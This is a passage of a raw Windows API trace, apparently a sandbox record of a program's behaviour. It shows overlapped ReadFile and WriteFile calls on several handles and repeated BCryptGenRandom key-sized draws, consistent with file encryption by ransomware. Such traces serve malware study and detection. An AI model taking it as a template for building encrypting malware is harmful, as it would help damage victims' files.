lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0145.938] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6688, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0145.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0145.965] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0145.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0145.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0145.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0145.973] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.973] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.973] free (_Block=0x3e305b8) [0145.973] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.973] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.973] free (_Block=0x1fa91d0) [0145.973] free (_Block=0x1fa2ed8) [0145.973] free (_Block=0x1fa90b8) [0145.973] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0145.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0145.987] CloseHandle (hObject=0xec) returned 1 [0145.988] free (_Block=0x3e70008) [0145.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.013] CloseHandle (hObject=0x2a8) returned 1 [0146.013] free (_Block=0x3d70450) [0146.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0146.022] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0146.023] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.023] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.023] free (_Block=0x3e305b8) [0146.023] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.023] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.023] free (_Block=0x1fa91d0) [0146.023] free (_Block=0x1fa2ed8) [0146.023] free (_Block=0x1fa90b8) [0146.023] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0146.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.033] CloseHandle (hObject=0x2a4) returned 1 [0146.033] free (_Block=0x3df0008) [0146.033] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.035] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x132c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.036] CloseHandle (hObject=0x2a8) returned 1 [0146.036] free (_Block=0x1ff1e60) [0146.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0146.085] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0146.097] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.097] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.101] free (_Block=0x3e305b8) [0146.101] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.101] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.102] free (_Block=0x1fa91d0) [0146.102] free (_Block=0x1fa2ed8) [0146.102] free (_Block=0x1fa90b8) [0146.102] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0146.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.103] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x11f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0146.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.123] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1b6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0146.132] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0146.133] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.133] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.133] free (_Block=0x3e305b8) [0146.133] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.133] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.134] free (_Block=0x1fa91d0) [0146.134] free (_Block=0x1fa2ed8) [0146.134] free (_Block=0x1fa90b8) [0146.134] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0146.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0146.160] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.160] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.160] free (_Block=0x3e305b8) [0146.160] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.160] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.161] free (_Block=0x1fa91d0) [0146.161] free (_Block=0x1fa2ed8) [0146.161] free (_Block=0x1fa90b8) [0146.161] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0146.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0146.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.175] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0146.176] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.176] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.176] free (_Block=0x3e305b8) [0146.176] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.176] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.176] free (_Block=0x1fa91d0) [0146.176] free (_Block=0x1fa2ed8) [0146.176] free (_Block=0x1fa90b8) [0146.176] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0146.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.185] CloseHandle (hObject=0x2a8) returned 1 [0146.185] free (_Block=0x1ff1e60) [0146.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.193] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1b2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0146.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0146.218] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.218] free (_Block=0x3e305b8) [0146.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.218] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.218] free (_Block=0x1fa91d0) [0146.218] free (_Block=0x1fa2ed8) [0146.218] free (_Block=0x1fa90b8) [0146.218] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0146.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0146.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0146.233] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.233] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.233] free (_Block=0x3e305b8) [0146.233] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.233] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.233] free (_Block=0x1fa91d0) [0146.233] free (_Block=0x1fa2ed8) [0146.233] free (_Block=0x1fa90b8) [0146.233] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0146.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.986] CloseHandle (hObject=0x2a4) returned 1 [0146.986] free (_Block=0x1ff1e60) [0146.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0146.996] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0146.997] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.004] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.005] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.008] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.017] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x462e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.045] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.045] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.045] free (_Block=0x3e305b8) [0147.045] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.045] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.045] free (_Block=0x1fa91d0) [0147.045] free (_Block=0x1fa2ed8) [0147.045] free (_Block=0x1fa90b8) [0147.045] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.052] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.053] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0147.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0147.054] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.054] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.054] free (_Block=0x3e305b8) [0147.054] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.054] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.055] free (_Block=0x1fa91d0) [0147.055] free (_Block=0x1fa2ed8) [0147.055] free (_Block=0x1fa90b8) [0147.055] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.056] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x72e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.057] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.058] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xb5a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.172] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x51aa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.197] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1ae8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0147.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.213] GetProcAddress (hModule=0x753f0000, 